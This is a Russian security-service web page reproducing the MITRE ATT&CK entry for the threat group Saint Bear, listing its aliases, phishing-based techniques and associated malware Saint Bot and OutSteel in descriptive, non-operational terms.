Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Преступная группа Saint Bear
CVE уязвимости
БДУ ФСТЭК уязвимости
НКЦКИ уязвимости
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
Риски
Каталоги
MITRE ATT&CK
Преступная группа
Saint Bear
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Saint Bear

Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )(Citation: Cadet Blizzard emerges as novel threat actor) Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.
ID: G1031
Associated Groups: Storm-0587, TA471, UAC-0056, Lorec53
Created: 25 May 2024
Last Modified: 12 Aug 2024

Associated Group Descriptions
Name Description
Storm-0587 (Citation: Cadet Blizzard emerges as novel threat actor)
TA471 (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
UAC-0056 (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Lorec53 (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

Techniques Used
Domain ID Name Use
Enterprise T1583 .006 Acquire Infrastructure: Web Services

Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
.003 Command and Scripting Interpreter: Windows Command Shell

Saint Bear initial loaders will also drop a malicious Windows batch file, available via open source GitHub repositories, that disables Microsoft Defender functionality.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

.007 Command and Scripting Interpreter: JavaScript

Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

Enterprise T1589 .002 Gather Victim Identity Information: Email Addresses

Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

Saint Bear clones .NET assemblies from other .NET binaries as well as cloning code signing certificates from other software to obfuscate the initial loader payload.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
.013 Obfuscated Files or Information: Encrypted/Encoded File

Saint Bear initial payloads included encoded follow-on payloads located in the resources file of the first-stage loader.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1608 .001 Stage Capabilities: Upload Malware

Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH."(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Enterprise T1204 .001 User Execution: Malicious Link

Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )(Citation: Cadet Blizzard emerges as novel threat actor)
.002 User Execution: Malicious File

Saint Bear relies on user interaction and execution of malicious attachments and similar for initial execution on victim systems.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )

Software
ID Name References Techniques
S1018 Saint Bot (Citation: Malwarebytes Saint Bot April 2021) (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) Regsvr32, Dynamic-link Library Injection, System Network Configuration Discovery, Bypass User Account Control, Obfuscated Files or Information, Masquerading, Ingress Tool Transfer, Web Protocols, System Information Discovery, Windows Command Shell, Time Based Evasion, Query Registry, Scheduled Task, Native API, Malicious File, Asynchronous Procedure Call, Spearphishing Link, Software Packing, Visual Basic, System Checks, PowerShell, Debugger Evasion, System Location Discovery, Registry Run Keys / Startup Folder, Deobfuscate/Decode Files or Information, Process Hollowing, Process Discovery, Spearphishing Attachment, Match Legitimate Name or Location, File and Directory Discovery, Hijack Execution Flow, System Owner/User Discovery, InstallUtil, Malicious Link, Standard Encoding, File Deletion, Data from Local System
S1017 OutSteel (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) Windows Command Shell, Exfiltration Over C2 Channel, Spearphishing Link, Malicious Link, Data from Local System, Automated Exfiltration, AutoHotKey & AutoIT, File and Directory Discovery, Automated Collection, Malicious File, Spearphishing Attachment, File Deletion, Lateral Tool Transfer, Web Protocols, Ingress Tool Transfer, Process Discovery, Match Legitimate Name or Location

References

  1. Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.
  2. Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.